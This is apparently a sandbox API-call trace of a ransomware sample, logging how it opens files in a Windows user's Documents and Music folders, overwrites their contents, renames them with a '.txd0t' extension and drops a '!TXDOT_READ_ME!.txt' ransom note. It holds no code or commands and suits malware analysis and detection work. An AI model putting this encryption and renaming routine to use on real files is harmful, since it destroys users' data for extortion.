psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" [0074.836] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t" [0074.836] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t") returned 0 [0074.836] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt", dwFileAttributes=0x80) returned 1 [0074.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\vtqy5qafnqpkv2th.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.837] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=45706) returned 1 [0074.837] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.837] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.837] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff4b76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.838] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xb280, lpNumberOfBytesRead=0x37ff3e0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3e0*=0xb280, lpOverlapped=0x0) returned 1 [0074.839] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff4d80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.839] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xb280, lpNumberOfBytesWritten=0x37ff3e4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3e4*=0xb280, lpOverlapped=0x0) returned 1 [0074.839] FlushFileBuffers (hFile=0x47c) returned 1 [0074.841] GetProcessHeap () returned 0xe30000 [0074.841] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x164) returned 0xeca148 [0074.841] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" [0074.841] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt") returned="vTQY5QAfnqPKv2th.odt" [0074.841] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.841] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 1 [0074.841] GetProcessHeap () returned 0xe30000 [0074.841] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.841] CloseHandle (hObject=0x47c) returned 1 [0074.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\vtqy5qafnqpkv2th.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\vtqy5qafnqpkv2th.odt.txd0t")) returned 1 [0074.843] SetEvent (hEvent=0x3f8) returned 1 [0074.843] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.847] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" [0074.847] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t" [0074.847] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t") returned 0 [0074.847] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav", dwFileAttributes=0x80) returned 1 [0074.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" (normalized: "c:\\users\\fd1hvy\\music\\33tpgndt5iew5l2r8q.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.848] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=67828) returned 1 [0074.848] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.848] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.849] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef50c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.849] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x108f0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x108f0, lpOverlapped=0x0) returned 1 [0074.850] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.850] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x108f0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x108f0, lpOverlapped=0x0) returned 1 [0074.850] FlushFileBuffers (hFile=0x460) returned 1 [0074.853] GetProcessHeap () returned 0xe30000 [0074.853] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0074.853] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" [0074.853] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav") returned="33TPGnDT5IeW5L2R8Q.wav" [0074.854] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.854] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt") returned 0 [0074.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0074.854] WriteFile (in: hFile=0x478, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0074.855] FlushFileBuffers (hFile=0x478) returned 1 [0074.857] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0074.858] FlushFileBuffers (hFile=0x478) returned 1 [0074.859] CloseHandle (hObject=0x478) returned 1 [0074.859] GetProcessHeap () returned 0xe30000 [0074.859] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.859] CloseHandle (hObject=0x460) returned 1 [0074.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav" (normalized: "c:\\users\\fd1hvy\\music\\33tpgndt5iew5l2r8q.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\33TPGnDT5IeW5L2R8Q.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\33tpgndt5iew5l2r8q.wav.txd0t")) returned 1 [0074.861] SetEvent (hEvent=0x3f8) returned 1 [0074.862] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.863] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" [0074.863] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t" [0074.863] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned 0 [0074.863] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a", dwFileAttributes=0x80) returned 1 [0074.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\kxtdlqhwmbicz2hhs6x.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.863] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=10556) returned 1 [0074.863] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.863] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.864] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffd4c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.864] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x2930, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x2930, lpOverlapped=0x0) returned 1 [0074.864] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffd6d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.865] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x2930, lpOverlapped=0x0) returned 1 [0074.865] FlushFileBuffers (hFile=0x460) returned 1 [0074.866] GetProcessHeap () returned 0xe30000 [0074.866] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x134) returned 0xe9b648 [0074.866] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" [0074.866] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a") returned="KXtDlQHWMbiCZ2hHs6x.m4a" [0074.866] StrCpyW (in: psz1=0xe9b6a6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.867] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned 0 [0074.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0074.875] WriteFile (in: hFile=0x478, lpBuffer=0x37ff444*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x37ff444*, lpNumberOfBytesWritten=0x37ff440*=0x2, lpOverlapped=0x0) returned 1 [0074.876] FlushFileBuffers (hFile=0x478) returned 1 [0074.878] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff440*=0x7f0, lpOverlapped=0x0) returned 1 [0074.879] FlushFileBuffers (hFile=0x478) returned 1 [0074.880] CloseHandle (hObject=0x478) returned 1 [0074.880] GetProcessHeap () returned 0xe30000 [0074.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.880] CloseHandle (hObject=0x460) returned 1 [0074.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\kxtdlqhwmbicz2hhs6x.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\kxtdlqhwmbicz2hhs6x.m4a.txd0t")) returned 1 [0074.882] SetEvent (hEvent=0x3f8) returned 1 [0074.882] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.884] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" [0074.884] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t" [0074.884] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned 0 [0074.884] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3", dwFileAttributes=0x80) returned 1 [0074.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\penlgp0qjdthkza-yo5o.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.884] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=32209) returned 1 [0074.884] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.884] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.885] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff802f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.885] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x7dd0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x7dd0, lpOverlapped=0x0) returned 1 [0074.886] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff8230, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.886] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x7dd0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x7dd0, lpOverlapped=0x0) returned 1 [0074.886] FlushFileBuffers (hFile=0x460) returned 1 [0074.888] GetProcessHeap () returned 0xe30000 [0074.888] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x136) returned 0xe9b648 [0074.888] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" [0074.888] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3") returned="pEnlGp0QjdthKZA-Yo5o.mp3" [0074.888] StrCpyW (in: psz1=0xe9b6a6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.888] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned 1 [0074.888] GetProcessHeap () returned 0xe30000 [0074.888] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.888] CloseHandle (hObject=0x460) returned 1 [0074.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\penlgp0qjdthkza-yo5o.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\penlgp0qjdthkza-yo5o.mp3.txd0t")) returned 1 [0074.890] SetEvent (hEvent=0x3f8) returned 1 [0074.890] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.891] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" [0074.891] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t" [0074.891] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t") returned 0 [0074.891] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3", dwFileAttributes=0x80) returned 1 [0074.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\esqxtlkmutc\\oadjkpb-\\zwncr2uv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.892] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=10928) returned 1 [0074.892] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.892] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.893] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffd350, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.893] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x2ab0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x2ab0, lpOverlapped=0x0) returned 1 [0074.893] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffd550, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.893] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x2ab0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x2ab0, lpOverlapped=0x0) returned 1 [0074.893] FlushFileBuffers (hFile=0x468) returned 1 [0074.903] GetProcessHeap () returned 0xe30000 [0074.903] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0074.903] StrCpyW (in: psz1=0xe9b648, 